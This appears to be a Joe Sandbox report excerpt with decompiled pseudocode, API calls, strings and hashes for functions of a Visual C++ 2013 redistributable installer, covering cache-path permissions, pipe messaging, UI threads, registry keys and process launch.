0x01289c60
0x01289c63
0x01289c64
0x01289c68
0x01289c6b
0x01289c6c
0x01289c6d
0x01289c72
0x01289c77
0x01289c9b
0x01289ca2
0x01289cc7
0x01289cc9
0x01289cce
0x01289cf4
0x01289cf8
0x01289cfd
0x01289d00
0x01289d05
0x00000000
0x01289cd0
0x01289cd0
0x01289ce0
0x01289ce3
0x01289ce8
0x00000000
0x01289ce8
0x01289ca4
0x01289ca4
0x01289cb4
0x01289cb7
0x01289cbc
0x01289cc1
0x01289cc1
0x00000000
0x01289cc1
0x01289c79
0x01289c84
0x01289c89
0x00000000
0x01289c89
0x01289c77
0x01289c3c
0x01289c47
0x01289c4c
0x01289d59
0x01289d59
0x01289d5c
0x01289d5c
0x01289d62
0x01289c3a
0x01289d6a

APIs

_memmove.LIBCMT ref: 01289D22
_memset.LIBCMT ref: 01289D31

Strings

Overflow while calculating size of variable array buffer, xrefs: 01289C89
variable.cpp, xrefs: 01289C42, 01289C7F, 01289CAF, 01289CDB, 01289D8C
Overflow while growing variable array size, xrefs: 01289C4C
Overflow while dealing with variable array buffer allocation, xrefs: 01289CE8
Failed to copy variable name., xrefs: 01289D54
Failed to allocate room for variables., xrefs: 01289D99
Failed to allocate room for more variables., xrefs: 01289CBC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memmove_memset
String ID: Failed to allocate room for more variables.$Failed to allocate room for variables.$Failed to copy variable name.$Overflow while calculating size of variable array buffer$Overflow while dealing with variable array buffer allocation$Overflow while growing variable array size$variable.cpp
API String ID: 3555123492-2816863117
Opcode ID: b33a0c78aea2ea3e7cf293042c59d4d6c66e68a56dd7a3f3620e2a3021004566
Instruction ID: 79ed853cf13878af4db86afe9b47dd041c2ee3fe4e2796aa70dbe3b88c40acbd
Opcode Fuzzy Hash: b33a0c78aea2ea3e7cf293042c59d4d6c66e68a56dd7a3f3620e2a3021004566
Instruction Fuzzy Hash: AD414D75771302FBEB24AF65CD82FBAB7A9EB54744F10411DF201BA1D1E6B4E5008758

Uniqueness

Uniqueness Score: -1.00%

Function 01297915 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01297915(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v40;
				char _v72;
				char _v104;
				char _v108;
				char _v136;
				intOrPtr _v140;
				void* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t35;
				signed int _t36;
				void* _t46;
				void* _t47;
				void* _t50;
				intOrPtr* _t53;
				signed int _t61;
				signed int _t62;
				void* _t66;

				_t66 = __eflags;
				_t50 = __edx;
				_t47 = __ecx;
				_t25 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t25 ^ _t62;
				_v140 = _a4;
				E012A7E30( &_v136, 0, 0x80);
				_v144 = 0;
				if(E012978CB(_t47,  &_v136, _t66, 0x1a, 0x1f01ff) >= 0) {
					__eflags = E012978CB(_t47,  &_v104, __eflags, 0x16, 0x1f01ff);
					if(__eflags >= 0) {
						__eflags = E012978CB(_t47,  &_v72, __eflags, 1, 0xa0000000);
						if(__eflags >= 0) {
							_t61 = E012978CB(_t47,  &_v40, __eflags, 0x1b, 0xa0000000);
							__eflags = _t61;
							if(_t61 >= 0) {
								_t35 =  &_v136;
								__imp__SetEntriesInAclW(4, _t35, 0,  &_v144);
								__eflags = _t35;
								if(__eflags == 0) {
									_t36 = E012AFA9A(_t47, _t50, 0xa0000000, _v140, 1, 0x80000005, _v108, 0, _v144, 0, 3, 0x7d0); // executed
									_t61 = _t36;
									__eflags = _t61;
									if(_t61 < 0) {
										_push(_v140);
										_push("Failed to secure cache path: %ls");
										goto L16;
									}
								} else {
									if(__eflags > 0) {
										_t35 = _t35 & 0x0000ffff | 0x80070000;
										__eflags = _t35;
									}
									_t61 = _t35;
									__eflags = _t61;
									if(_t61 >= 0) {
										_t61 = 0x80004005;
									}
									E012B294E(_t35, "cache.cpp", 0x5b1, _t61);
									_push(_v140);
									_push("Failed to create ACL to secure cache path: %ls");
									goto L16;
								}
							} else {
								_push(_v140);
								_push("Failed to allocate access for Users group to path: %ls");
								goto L16;
							}
						} else {
							_push(_v140);
							_push("Failed to allocate access for Everyone group to path: %ls");
							goto L16;
						}
					} else {
						_push(_v140);
						_push("Failed to allocate access for SYSTEM group to path: %ls");
						goto L16;
					}
				} else {
					_push(_v140);
					_push("Failed to allocate access for Administrators group to path: %ls");
					L16:
					_push(_t61);
					E012AFA86();
				}
				if(_v144 != 0) {
					LocalFree(_v144);
				}
				_t53 =  &_v108;
				_t46 = 4;
				do {
					_t37 =  *_t53;
					if( *_t53 != 0) {
						E012B24F6(_t37);
					}
					_t53 = _t53 + 0x20;
					_t46 = _t46 - 1;
				} while (_t46 != 0);
				return E012A7EAA(_t61, _t46, _v8 ^ _t62, _t50, _t53, _t61);
			}

0x01297915
0x01297915
0x01297915
0x0129791e
0x01297925
0x01297933
0x01297943
0x01297959
0x01297968
0x01297987
0x01297989
0x012979ad
0x012979af
0x012979cc
0x012979ce
0x012979d0
0x012979ea
0x012979f3
0x012979f9
0x012979fb
0x01297a50
0x01297a55
0x01297a57
0x01297a59
0x01297a5b
0x01297a61
0x00000000
0x01297a61
0x012979fd
0x012979fd
0x01297a04
0x01297a04
0x01297a04
0x01297a09
0x01297a0b
0x01297a0d
0x01297a0f
0x01297a0f
0x01297a1f
0x01297a24
0x01297a2a
0x00000000
0x01297a2a
0x012979d2
0x012979d2
0x012979d8
0x00000000
0x012979d8
0x012979b1
0x012979b1
0x012979b7
0x00000000
0x012979b7
0x0129798b
0x0129798b
0x01297991
0x00000000
0x01297991
0x0129796a
0x0129796a
0x01297970
0x01297a66
0x01297a66
0x01297a67
0x01297a6c
0x01297a75
0x01297a7d
0x01297a7d
0x01297a85
0x01297a88
0x01297a89
0x01297a89
0x01297a8d
0x01297a90
0x01297a90
0x01297a95
0x01297a98
0x01297a98
0x01297aab

APIs

_memset.LIBCMT ref: 01297943
LocalFree.KERNEL32(?,?,00000001,80000005,?,00000000,?,00000000,00000003,000007D0), ref: 01297A7D

Strings

Failed to secure cache path: %ls, xrefs: 01297A61
Failed to allocate access for Users group to path: %ls, xrefs: 012979D8
Failed to allocate access for Administrators group to path: %ls, xrefs: 01297970
Failed to allocate access for Everyone group to path: %ls, xrefs: 012979B7
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 01297991
cache.cpp, xrefs: 01297A1A
Failed to create ACL to secure cache path: %ls, xrefs: 01297A2A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FreeLocal_memset
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 3302596199-4113288589
Opcode ID: f0e24b79daabc294ba1a3ce97c06cbfd9e0ec59876a965113a1a895e9fdf1f28
Instruction ID: 79ba5e4c4e2d9fb4f715bc993fdbe2c5366913e9e1025958d168e23566f61629
Opcode Fuzzy Hash: f0e24b79daabc294ba1a3ce97c06cbfd9e0ec59876a965113a1a895e9fdf1f28
Instruction Fuzzy Hash: 6241C872D3022AEBDF20AA988C85FEDB774BB04700F4185A8F749B7140EA755F858F91

Uniqueness

Uniqueness Score: -1.00%

Function 0129152B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100
threadCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0129152B(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t31;
				void* _t34;
				signed int _t41;
				signed int _t45;
				intOrPtr _t53;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0;
				asm("stosd");
				_t31 = CreateEventW(0, 1, 0, 0);
				_v16 = _t31;
				if(_t31 != 0) {
					_t53 = _a8;
					_v28 = _t31;
					_v24 = _a4;
					_v20 = _t53;
					_t34 = CreateThread(0, 0, E01291377,  &_v28, 0, 0); // executed
					_v12 = _t34;
					if(_t34 != 0) {
						WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
						 *((intOrPtr*)(_t53 + 0x3d4)) = _v12;
						_v12 = 0;
					} else {
						_t41 = GetLastError();
						if(_t41 > 0) {
							_t41 = _t41 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t41;
						if(_t41 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t41, "uithread.cpp", 0x44, _v8);
						_push("Failed to create the UI thread.");
						goto L12;
					}
				} else {
					_t45 = GetLastError();
					if(_t45 > 0) {
						_t45 = _t45 & 0x0000ffff | 0x80070000;
					}
					_v8 = _t45;
					if(_t45 >= 0) {
						_v8 = 0x80004005;
					}
					E012B294E(_t45, "uithread.cpp", 0x3b, _v8);
					_push("Failed to create initialization event.");
					L12:
					_push(_v8);
					E012AFA86();
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					FindCloseChangeNotification(_v16); // executed
				}
				return _v8;
			}

0x01291539
0x0129153a
0x01291542
0x01291545
0x01291549
0x0129154c
0x0129154d
0x01291553
0x01291558
0x01291592
0x01291596
0x0129159d
0x012915ab
0x012915ae
0x012915b4
0x012915b9
0x01291606
0x0129160f
0x01291615
0x012915bb
0x012915bb
0x012915c3
0x012915ca
0x012915ca
0x012915cf
0x012915d4
0x012915d6
0x012915d6
0x012915e7
0x012915ec
0x00000000
0x012915ec
0x0129155a
0x0129155a
0x01291562
0x01291569
0x01291569
0x0129156e
0x01291573
0x01291575
0x01291575
0x01291586
0x0129158b
0x012915f1
0x012915f1
0x012915f4
0x012915fa
0x01291621
0x01291626
0x01291628
0x01291628
0x0129162e
0x01291633
0x01291633
0x0129163c

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,01281E12,?), ref: 0129154D
GetLastError.KERNEL32(?,?,01281E12,?), ref: 0129155A
CreateThread.KERNELBASE ref: 012915AE
GetLastError.KERNEL32(?,?,01281E12,?), ref: 012915BB
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,01281E12,?), ref: 01291606
CloseHandle.KERNEL32(00000001,?,?,01281E12,?), ref: 01291626
FindCloseChangeNotification.KERNELBASE(?,?,?,01281E12,?), ref: 01291633

Strings

Failed to create initialization event., xrefs: 0129158B
uithread.cpp, xrefs: 01291581, 012915E2
Failed to create the UI thread., xrefs: 012915EC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateErrorLast$ChangeEventFindHandleMultipleNotificationObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 1372344712-3599963359
Opcode ID: e1d73409341dc085c3adcca0586611219a6106e96171969cf49a46af16175bf7
Instruction ID: 4ec253930ab3864aa87f0e157dd77ee89b8841528e133b542e91cd7a5d4ccb8d
Opcode Fuzzy Hash: e1d73409341dc085c3adcca0586611219a6106e96171969cf49a46af16175bf7
Instruction Fuzzy Hash: 1E315CB6D2020AFFDF10DFA9DD859AEBFB8FB08310F24456AE215F2140D3745A548B91

Uniqueness

Uniqueness Score: -1.00%

Function 01282FFE Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 120
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E01282FFE(intOrPtr* __eax, void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				intOrPtr _v20;
				void* _t34;
				int _t37;
				long _t39;
				void* _t42;
				signed int _t44;
				signed int _t49;
				intOrPtr* _t53;
				struct _OVERLAPPED* _t60;
				void* _t63;

				_t60 = 0;
				_t53 = __eax;
				asm("stosd");
				_v8 = 0;
				asm("stosd");
				_v12 = 0;
				do {
					_push(0);
					_push( &_v12);
					_t34 = 8;
					_t37 = ReadFile(_a4, _t63 + _t60 - 0x10, _t34 - _t60, ??, ??); // executed
					if(_t37 != 0) {
						goto L8;
					}
					_t49 = GetLastError();
					if(_t49 != 0xea) {
						if(_t49 == 0x6d) {
							asm("stosd");
							asm("stosd");
							_v8 = 1;
							break;
						}
						if(_t49 > 0) {
							_t49 = _t49 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t49;
						if(_t49 < 0) {
							E012B294E(_t49, "pipe.cpp", 0x331, _v8);
							_push("Failed to read message from pipe.");
							L20:
							_push(_v8);
							L21:
							E012AFA86();
							L23:
							if( *((intOrPtr*)(_t53 + 8)) == 0) {
								_t54 =  *(_t53 + 0xc);
								if( *(_t53 + 0xc) != 0) {
									E012B24F6(_t54);
								}
							}
							return _v8;
						} else {
							goto L8;
						}
					}
					_v8 = _v8 & 0x00000000;
					L8:
					_t60 = _t60 + _v12;
				} while (_t60 < 8);
				 *_t53 = _v20;
				_t39 = _v16;
				 *(_t53 + 4) = _t39;
				if(_t39 == 0) {
					goto L23;
				}
				_t42 = E012B233B(_t39, 0);
				 *(_t53 + 0xc) = _t42;
				if(_t42 != 0) {
					if(ReadFile(_a4, _t42,  *(_t53 + 4),  &_v12, 0) != 0) {
						 *((intOrPtr*)(_t53 + 8)) = 1;
						goto L23;
					}
					_t44 = GetLastError();
					if(_t44 > 0) {
						_t44 = _t44 & 0x0000ffff | 0x80070000;
					}
					_v8 = _t44;
					if(_t44 >= 0) {
						_v8 = 0x80004005;
					}
					E012B294E(_t44, "pipe.cpp", 0x340, _v8);
					_push("Failed to read data for message.");
					goto L20;
				}
				_v8 = 0x8007000e;
				E012B294E(_t42, "pipe.cpp", 0x33c, 0x8007000e);
				_push("Failed to allocate data for message.");
				_push(0x8007000e);
				goto L21;
			}

0x01283007
0x01283009
0x01283010
0x01283011
0x01283014
0x01283015
0x01283018
0x01283018
0x0128301d
0x01283020
0x0128302c
0x01283034
0x00000000
0x00000000
0x01283036
0x01283041
0x0128304c
0x012830b3
0x012830b4
0x012830b5
0x00000000
0x012830b5
0x01283050
0x01283057
0x01283057
0x0128305c
0x01283061
0x012830cb
0x012830d0
0x01283126
0x01283126
0x01283129
0x01283129
0x01283139
0x0128313d
0x0128313f
0x01283144
0x01283147
0x01283147
0x01283144
0x01283153
0x00000000
0x00000000
0x00000000
0x01283061
0x01283043
0x01283063
0x01283063
0x01283066
0x0128306e
0x01283070
0x01283075
0x0128307a
0x00000000
0x00000000
0x01283082
0x01283087
0x0128308c
0x012830eb
0x01283132
0x00000000
0x01283132
0x012830ed
0x012830f5
0x012830fc
0x012830fc
0x01283101
0x01283106
0x01283108
0x01283108
0x0128311c
0x01283121
0x00000000
0x01283121
0x0128309e
0x012830a1
0x012830a6
0x012830ab
0x00000000

APIs

ReadFile.KERNELBASE(00000000,?,00000008,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0128302C
GetLastError.KERNEL32(?,?,?,00000000), ref: 01283036
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,?,?,00000000), ref: 012830E3
GetLastError.KERNEL32(?,?,?,00000000), ref: 012830ED

Strings

Failed to read message from pipe., xrefs: 012830D0
Failed to allocate data for message., xrefs: 012830A6
pipe.cpp, xrefs: 01283099, 012830C6, 01283117
Failed to read data for message., xrefs: 01283121

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
API String ID: 1948546556-3912962418
Opcode ID: d61cfc37e734ac7d3a7976a5bf755cbcebca40c623d06a6c7bd6667b352f36a9
Instruction ID: 153cf624e46bad7b93fcd044562e659cf58133b4c168a53ef239a8e41cb2a45b
Opcode Fuzzy Hash: d61cfc37e734ac7d3a7976a5bf755cbcebca40c623d06a6c7bd6667b352f36a9
Instruction Fuzzy Hash: 4F41A571921216FBDB11EE95CD85AAEBA79FF04F50F108465E601FA181D2B5DA018790

Uniqueness

Uniqueness Score: -1.00%

Function 01290E3A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 01290E50
GetLastError.KERNEL32 ref: 01290E5A
CoInitializeEx.OLE32(00000000,00000000), ref: 01290E9C
CoUninitialize.OLE32(?,01290347,?,?), ref: 01290ED9

Strings

Failed to set elevated cache pipe into thread local storage for logging., xrefs: 01290E89
elevation.cpp, xrefs: 01290E7F
Failed to initialize COM., xrefs: 01290EA8
Failed to pump messages in child process., xrefs: 01290EC7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: 2c2bea61c55fc75be84f1dc9a5224d50d93e7447b3f34125785af870370e17e5
Instruction ID: fd7b99dc10c1aee624951b07333d2e7975bcfa10fd60d3efa10a9a6463dde20a
Opcode Fuzzy Hash: 2c2bea61c55fc75be84f1dc9a5224d50d93e7447b3f34125785af870370e17e5
Instruction Fuzzy Hash: 9F11A03397161ABBDB225759DC09A9F7A5CEF04B61F000119FA45F7250DB55EC4047D8

Uniqueness

Uniqueness Score: -1.00%

Function 012871FB Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 133
registryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E012871FB(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				void* __edi;
				void* __esi;
				void* _t45;
				void* _t49;
				void* _t63;
				void* _t67;
				void* _t71;
				void* _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t71 = __edx;
				_t75 = _a4;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_push(E01291879( *((intOrPtr*)(_t75 + 8))));
				_push(E01291A24(_a12));
				_push(E01291A53(_a8));
				E01281566(2, 0x20000174,  *((intOrPtr*)(_t75 + 0x50)));
				_t78 = _t77 + 0x18;
				if(_a12 != 0) {
					_t63 = E012B177A( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_t75 + 0x50)));
					_t78 = _t78 + 0xc;
					if(_t63 < 0) {
						L3:
						_push("Failed to write volatile reboot required registry key.");
						E012AFA86();
						_t67 = _t63;
					} else {
						_t63 = E012B371B( *((intOrPtr*)(_t75 + 0x4c)), _v16, 0x20006, 1, 0,  &_v12, 0);
						if(_t63 < 0) {
							goto L3;
						}
					}
				}
				if(_a8 != 0) {
					_t45 = E012B378B( *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0x20006,  &_v8); // executed
					_t73 = _t45;
					if(_t73 >= 0) {
						goto L14;
					} else {
						_push("Failed to open registration key.");
						goto L16;
					}
				} else {
					if(_a16 == 1 || _a16 == 2) {
						E0129F807(_t67, _t71, _t75);
					}
					if( *((intOrPtr*)(_t75 + 0x9c)) != 0) {
						E012860CD(_t75, _t67, _t71);
					}
					_t19 = _t75 + 0x94; // 0x95
					E01285FE4(_t67, _t71, _t19,  *_t75);
					_t73 = E012B396D(_t67, _t71,  *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0, 0);
					if(_t73 == 0x80070002 || _t73 >= 0) {
						E0129977F(_t67, _t71, _t73,  *_t75,  *((intOrPtr*)(_t75 + 0x10)));
						L14:
						_t49 = E01286893(_a8, _t67, _t71, _t75, _v8, 0 | _a12 == 0x00000002); // executed
						_t73 = _t49;
						if(_t73 < 0) {
							_push("Failed to update resume mode.");
							L16:
							_push(_t73);
							E012AFA86();
						}
					} else {
						E012AFA86(_t73, "Failed to delete registration key: %ls",  *((intOrPtr*)(_t75 + 0x50)));
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = 0;
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				return _t73;
			}

0x012871fb
0x01287203
0x0128720c
0x0128720f
0x01287212
0x0128721a
0x01287223
0x0128722c
0x01287237
0x0128723c
0x01287247
0x01287255
0x0128725a
0x0128725f
0x01287279
0x01287279
0x0128727f
0x01287285
0x01287261
0x01287270
0x01287277
0x00000000
0x00000000
0x01287277
0x0128725f
0x01287289
0x0128735e
0x01287363
0x01287367
0x00000000
0x01287369
0x01287369
0x00000000
0x01287369
0x0128728f
0x01287293
0x0128729c
0x0128729c
0x012872a7
0x012872ab
0x012872ab
0x012872b2
0x012872b8
0x012872ca
0x012872d2
0x012872f0
0x012872f5
0x01287305
0x0128730a
0x0128730e
0x01287310
0x01287315
0x01287315
0x01287316
0x0128731c
0x012872d8
0x012872e1
0x012872e6
0x012872d2
0x01287326
0x0128732b
0x0128732d
0x0128732d
0x01287333
0x01287338
0x0128733a
0x0128733a
0x01287340
0x01287345
0x01287345
0x01287350

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,?,00020006,00000000,00000000,00000000,?,00000000,00000001), ref: 0128732B
RegCloseKey.ADVAPI32(00000001,00000000,00000000,?,?,00020006,00000000,00000000,00000000,?,00000000,00000001), ref: 01287338

Part of subcall function 012B371B: RegCreateKeyExW.KERNELBASE(00000001,00000000,00000000,00000000,00000000,00000001,012813BB,?,?,00000001,?,01287275,?,012813BB,00020006,00000001), ref: 012B373F

Strings

Failed to update resume mode., xrefs: 01287310
Failed to open registration key., xrefs: 01287369
%ls.RebootRequired, xrefs: 0128724F
Failed to write volatile reboot required registry key., xrefs: 01287279
Failed to delete registration key: %ls, xrefs: 012872DB

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
API String ID: 359002179-2517785395
Opcode ID: 1439d7fe25914167e3bc75ad7151cbab017ec107d32f5d71d32ffae4a36865c7
Instruction ID: 2186c1191585ba5ac17736658ddc2f71a9e470107f44ad269facfe66c14997e5
Opcode Fuzzy Hash: 1439d7fe25914167e3bc75ad7151cbab017ec107d32f5d71d32ffae4a36865c7
Instruction Fuzzy Hash: C641BD7292120ABFDF21BFA4DC81CFE7BBABF14304B24482EF60162051C7719A609B91

Uniqueness

Uniqueness Score: -1.00%

Function 012AFF4A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
processCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E012AFF4A(WCHAR* _a4, intOrPtr _a8, short _a12, void** _a16) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				intOrPtr _t28;
				int _t38;
				signed int _t40;
				signed int _t46;
				long _t47;

				_t47 = 0x44;
				_v8 = 0;
				E012A7E30( &_v92, 0, _t47);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t28 = _a8;
				if(_t28 == 0) {
					_t28 = 0x12ba5c8;
				}
				_push(_t28);
				_t46 = E012B177A( &_v8, L"\"%ls\" %ls", _a4);
				if(_t46 >= 0) {
					_v92.wShowWindow = _a12;
					_v92.cb = _t47;
					_t38 = CreateProcessW(_a4, _v8, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
					if(_t38 != 0) {
						 *_a16 = _v24.hProcess;
						_v24.hProcess = 0;
					} else {
						_t40 = GetLastError();
						if(_t40 > 0) {
							_t40 = _t40 & 0x0000ffff | 0x80070000;
						}
						_t46 = _t40;
						if(_t46 >= 0) {
							_t46 = 0x80004005;
						}
						E012B294E(_t40, "procutil.cpp", 0xa6, _t46);
					}
				}
				if(_v24.hThread != 0) {
					CloseHandle(_v24.hThread);
					_v24.hThread = 0;
				}
				if(_v24.hProcess != 0) {
					CloseHandle(_v24.hProcess);
					_v24 = 0;
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t46;
			}

0x012aff55
0x012aff5e
0x012aff61
0x012aff6b
0x012aff6c
0x012aff6d
0x012aff6e
0x012aff6f
0x012aff77
0x012aff79
0x012aff79
0x012aff7e
0x012aff90
0x012aff97
0x012aff9d
0x012affb2
0x012affb8
0x012affc0
0x012afff9
0x012afffb
0x012affc2
0x012affc2
0x012affca
0x012affd1
0x012affd1
0x012affd6
0x012affda
0x012affdc
0x012affdc
0x012affec
0x012affec
0x012affc0
0x012b0007
0x012b000c
0x012b000e
0x012b000e
0x012b0014
0x012b0019
0x012b001b
0x012b001b
0x012b0021
0x012b0026
0x012b0026
0x012b0031

APIs

_memset.LIBCMT ref: 012AFF61
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01282A93), ref: 012AFFB8
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 012AFFC2
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 012B000C
CloseHandle.KERNEL32(01282A93,?,?,?,?,00000000,00000000,00000000), ref: 012B0019

Strings

"%ls" %ls, xrefs: 012AFF85
procutil.cpp, xrefs: 012AFFE7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: "%ls" %ls$procutil.cpp
API String ID: 1393943095-4145822745
Opcode ID: 8f8b42e29dda8f6600a5b0f350bd291c8241cb9c1f604f79df5e603e4858d509
Instruction ID: 8aa69980e0cc9314f013ee1e884c4d85983a28208d9428eb66e129cfc2d5b204
